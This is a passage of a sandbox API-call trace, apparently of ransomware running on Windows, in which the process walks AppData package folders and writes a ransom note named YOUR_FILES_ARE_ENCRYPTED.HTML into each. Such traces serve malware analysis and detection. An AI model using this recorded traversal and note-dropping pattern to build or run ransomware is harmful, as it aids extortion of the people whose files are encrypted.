lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState\\*" [0116.538] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626638 [0116.538] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0116.538] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d15c, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 0 [0116.538] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0116.538] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 141 [0116.538] GetProcessHeap () returned 0x600000 [0116.538] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.538] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0116.539] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.540] CloseHandle (hObject=0x32c) returned 1 [0116.540] GetProcessHeap () returned 0x600000 [0116.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.540] GetProcessHeap () returned 0x600000 [0116.540] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.540] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6803cef0, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6803cef0, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6803cef0, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0116.540] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.540] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0116.540] GetProcessHeap () returned 0x600000 [0116.540] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftSolitaireCollection_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftsolitairecollection_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0116.541] WriteFile (in: hFile=0x31c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0116.557] CloseHandle (hObject=0x31c) returned 1 [0116.558] GetProcessHeap () returned 0x600000 [0116.558] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.558] GetProcessHeap () returned 0x600000 [0116.558] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0116.559] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", cAlternateFileName="MICROS~2.0_8")) returned 1 [0116.559] StrStrIW (lpFirst="Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.559] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe") returned 97 [0116.559] GetProcessHeap () returned 0x600000 [0116.559] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0116.560] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe" [0116.560] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\*" [0116.560] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.562] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf7c8d0a7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0116.562] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AC", cAlternateFileName="")) returned 1 [0116.562] StrStrIW (lpFirst="AC", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.562] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC") returned 100 [0116.562] GetProcessHeap () returned 0x600000 [0116.562] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.562] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC" [0116.562] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\*" [0116.563] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0116.564] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="..", cAlternateFileName="")) returned 1 [0116.564] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0116.564] StrStrIW (lpFirst="INetCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.564] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache") returned 110 [0116.564] GetProcessHeap () returned 0x600000 [0116.564] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.566] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache" [0116.566] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*" [0116.566] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.567] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 1 [0116.567] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 0 [0116.567] FindClose (in: hFindFile=0x6268b8 | out: hFindFile=0x6268b8) returned 1 [0116.567] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0116.567] GetProcessHeap () returned 0x600000 [0116.567] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.567] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.568] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.569] CloseHandle (hObject=0x214) returned 1 [0116.569] GetProcessHeap () returned 0x600000 [0116.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.569] GetProcessHeap () returned 0x600000 [0116.569] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.570] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0116.570] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.570] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies") returned 112 [0116.570] GetProcessHeap () returned 0x600000 [0116.570] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.571] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies" [0116.571] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0116.571] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.571] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 1 [0116.571] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d090, dwReserved1=0x31847d8, cFileName="..", cAlternateFileName="")) returned 0 [0116.571] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.571] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 142 [0116.571] GetProcessHeap () returned 0x600000 [0116.571] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.net.native.framework.1.0_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.572] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.573] CloseHandle (hObject=0x214) returned 1 [0116.573] GetProcessHeap () returned 0x600000 [0116.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.573] GetProcessHeap () returned 0x600000 [0116.573] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.573] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xf7d71de1, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf7d71de1, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf7d71de1, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3184894, dwReserved1=0x31847d0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.573] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.573] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory") returned 112 [0116.573] GetProcessHeap () returned 0x600000 [0116.573] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.574] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory" [0116.574] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.NET.Native.Framework.1.0_8wekyb3d8bbwe\\AC\\INetHistory\\*" 